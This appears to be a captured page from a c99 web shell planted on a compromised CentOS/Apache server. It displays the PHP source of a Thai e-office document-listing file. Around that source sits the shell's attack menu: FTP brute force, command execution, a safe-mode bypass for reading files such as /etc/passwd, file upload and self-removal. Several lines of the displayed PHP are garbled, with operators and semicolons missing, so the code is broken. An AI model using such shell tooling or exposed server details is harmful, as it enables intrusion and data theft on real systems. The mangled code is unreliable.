!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 52.23 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSelectDocPreReceive.php (8.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?PHP
header("content-type: application/x-javascript; charset=TIS-620");
include_once "includefile.php";
?>
<?
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../class/clsTable.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsPerson.php";
include_once "../link/function.php";
include_once "../class/clsDocLinePosition.php";
include_once "../class/clsDocLineConfig.php";
include_once "../class/clsReceiveSendType.php";
include_once "../class/clsDocType.php";
include_once "../link/functionshow.php";
include_once "../class/clsDocattatchesTmp.php";
include_once "../class/clsDocuments.php";
include_once "../class/clsDocSpeedLevel.php";
include_once "../class/clsDocSecreLevel.php";
include_once "../class/clsDocReceiveSend.php";
include_once "funct.php";
include_once "../link/keyThai.php";
$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlc4 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oDlp2 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc1 = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDoc3 = new Documents($oC);
$oDoc4 = new Documents($oC);
$oDoc5 = new Documents($oC);
$oDoc5 = new Documents($oC);
$oDoc6 = new Documents($oC);
$oDoc7 = new Documents($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDsl2 = new DocSpeedLevel($oC);
$oDcl2 = new DocSecretLevel($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$MaxDocGroup=$oDP->SearchMaxDocGroup();
$InputThai=$oSys->SearchByInputThai();
$useReceiveAll=$oSys->SearchuseReceiveAll();
?>
      <table width="99%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA" style="border-collapse:collapse">
      <tr height=22>
              <td width="10%" align="center" background="../picture/table_header_bg.gif"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>ที่&nbsp;ลงวันที่</strong></font></td>
              <td width="15%" align="center" background="../picture/table_header_bg.gif"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>จาก/ที่มา (ต้นเรื่อง)</strong></font></td>
              <td <? if($useReceiveAll=="Y"){ ?>width="21%"<? }else{ ?>width="23%" <? }?> align="center" background="../picture/table_header_bg.gif"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>เรื่อง</strong></font></td>
              <td width="9%" align="center" background="../picture/table_header_bg.gif"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>วันที่ได้รับหนังสือ</strong></font></td>
              <td width="2%" align="center" background="../picture/table_header_bg.gif"><img src="../picture/rapid0.jpg"   border="0" ></td>
              <td width="2%" align="center" background="../picture/table_header_bg.gif"><img src="../picture/secret0.jpg"   border="0" ></td>
              <? if($useReceiveAll=="Y"){ ?><td width="2%" background="../picture/table_header_bg.gif">&nbsp;</td><? ?>
      </tr>
           <?     $i=0
                $searchpredocdate=splitDateForm($searchpredocdate,"/");
                $numRow2=$oDoc7->SearchCountDocReceive2($DLCID,$MaxDocGroup,$DlcPS2,th2a($searchNamePre),th2a($searchNoPre),$searchpredocdate,$selectpredocdatevalue,th2a($searchDeptPre));
            if($numRow2!=0){    
                $total_page2 = (int)($numRow2/$pgajax);
                if(($numRow2%$pgajax) != 0)
                    $total_page2++;
                
                if($page_id2!=""){   if($page_id2>$total_page2){  $page_id2 1$start2 0; }}else{   $page_id2 1$start2 0;}
                if(isset($page_id2))
                    $start2 $pgajax*($page_id2-1);
                else {
                    $page_id2 1;
                    $start2 0;
                }                
                if($s==""){  $s="1"; } 
                
                  $oDoc->SearchByDlcIDDocGroupPSDlcID2DsID0DrsSendDatelimit($DLCID,$MaxDocGroup,$DlcPS2,$start2,$pgajax,th2a($searchNamePre),th2a($searchNoPre),$searchpredocdate,$selectpredocdatevalue,th2a($searchDeptPre),th2a($searchDeptPre));
                                  
                  while($oDoc->GetRecord()){ 
                    if(($i%2) == 0)   
                                              echo "<tr bgcolor=\"#FFFFFF\" height=22 >";
                                        else
                                              echo "<tr bgcolor=\"".$GLOBALS["COLOR_BG_TD_16"]."\"  height=22 align=\"left\">";
                  ?>
               <td height="35">&nbsp;<? if($oDoc->DtID!=15){ echo $oDoc->DocNo; }else{ echo '-'; } ?><br>&nbsp;<? echo abbreDate2($oDoc->DocDate,'/'); ?></td>
              <td align="left">
              <? if($oDoc->DtID=="1" || $oDoc->DtID=="2" || $oDoc->DtID=="14"){
                                echo "&nbsp;".$oDoc->DocFrom."<br>";
                    }else{
                        if($oDoc->DocPID=="0"){
                                $oDlc2->SearchByKey($oDoc->DlcID); $oDlc2->GetRecord();
                                $oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();
                        }else{
                                $oDoc5->SearchByKey($oDoc->DocPID); $oDoc5->GetRecord();
                                $oDlc2->SearchByKey($oDoc5->DlcID); $oDlc2->GetRecord();
                                $oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();
                        }
                                echo "&nbsp;".$oDoc->DocFrom."<br>";
                                echo "&nbsp;(".$oDlp->DlpName.")";                    
                    }
                    
              ?>
              </td>
              <td align="left">&nbsp;<? echo showeDoc($oDoc->eDoc); ?><a href="showReceiveDoc.php?page_id2=<?php echo $page_id2;?>&DtID=<? echo $oDoc->DtID;?>&RsID=<? echo $oDoc->RsID?>&DocID=<?php echo $oDoc->DocID;?>&DrsID=<? echo $oDoc->DrsID?>&searchpredocdate=<? echo $searchpredocdate;?>&selectpredocdatevalue=<? echo $selectpredocdatevalue;?>&searchpredocdate=<? echo $searchpredocdate?>&searchNamePre=<? echo $searchNamePre;?>&searchNoPre=<? echo $searchNoPre;?>&searchDeptPre=<? echo $searchDeptPre;?>"><? if($oDoc->DtID=="13"){  echo "ชื่อผู้ได้รับการรับรอง<br>".$oDoc->CertificatePs;  }else{  echo $oDoc->DocSubject; } ?></a>
               <td align="center">
              <?
                list($DocD,$DocT) = preg_split('[ ]',$oDoc->DrsReceiveDate );
                echo abbreDate2($DocD,'/')."<br>".a2th($DocT);
            ?>
            </td>
            <td align="center"><? echo searchPicDocSpeedLevel($oDoc->DslID); ?></td>
            <td align="center"><? echo searchPicDocSecretLevel($oDoc->DclID); ?></td>
            <? if($useReceiveAll=="Y"){ ?><td align="center"><input type='checkbox'  name='check_DrsID' onclick='test()' value='<?php echo $oDoc->DrsID?>' />
            </td><? ?>
       </tr>
          <? $i++;  }  
            }  // if($numRow!=0)?>
      </table>
        </div>
              <table width="99%" align="center" border=0 cellpadding="0" cellspacing="0" bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_13'];?>"  height="22">
            <? if($i=="0"){?>
              <tr height=22><td align="center" bgcolor="#FFFFFF" colspan="11"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">** ไม่มีรายการหนังสือเข้า **</font></td></tr>
              <tr height=22 bgcolor="#DADADA"><td align="right" colspan="11">&nbsp;</td></tr>
            <? }else{   
                        if($useReceiveAll=="Y"){
            ?>
            <tr>
              <td align="right"  colspan="8" bgcolor="#D2D2D2"> <font color="#000066">เลือกทั้งหมด</font>
<input type='checkbox' id="ch_all" name='check_DrsID' onClick="if(this.checked)checkAll(); else clearAll()" />    <br>
 <input type="hidden" id="st_val" name="store_DrsID" style="border:#000000 1px solid" > 
             <span style="padding-left:180px">
              <input type="submit" value=" ลงทะเบียนรับ"  ></span></td></tr>
            <? ?>
             <tr height=22 bgcolor="#DADADA"><td align="right" colspan="11"><strong>หน้า-&gt;</strong>
                <?php
                                    for ($num=1$num<=$total_page2$num++) {    
                                        if($num == $page_id2){
                                            echo  a2th($num)." ";
                                        }else {
                ?>
                                            <a href="receiveDoc.php?page_id2=<?php echo $num;?>&searchdocdate=<? echo $searchdocdate;?>&selectpredocdatevalue=<? echo $selectpredocdatevalue;?>&searchpredocdate=<? echo $searchpredocdate?>&searchNamePre=<? echo $searchNamePre;?>&searchNoPre=<? echo $searchNoPre;?>&searchDeptPre=<? echo $searchDeptPre;?>"><?php echo '[ 'a2th($num).' ]'; if($num==14){echo "<br>";} ?></a>
                <?php
                                        }
                                    }
                ?>&nbsp;&nbsp;</td></tr>
                <? ?>
               <tr height=22 bgcolor="#FFFFFF" >
              <td  colspan="11" valign="bottom"><br><hr color="#000099"></hr></td>
            </tr>
          </table> 
<script type="text/javascript">
function checkAll()
{
var check_DrsID_len = document.gg.check_DrsID.length;
 document.getElementById('st_val').value='';
 
for ( i = 0; i<check_DrsID_len ; i++)
 { 
  document.gg.check_DrsID[i].checked=true;
  document.getElementById('st_val').value+=document.gg.check_DrsID[i].value+',';
 
  }
  fin_str =  document.getElementById('st_val').value;
  
   document.getElementById('st_val').value  = fin_str.replace(',on,','');
   
}

function clearAll()
{
var check_DrsID_len = document.gg.check_DrsID.length;
for ( i = 0; i<check_DrsID_len ; i++)
 {
  document.gg.check_DrsID[i].checked=false;
  document.getElementById('st_val').value='';
  
  }
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0073 ]--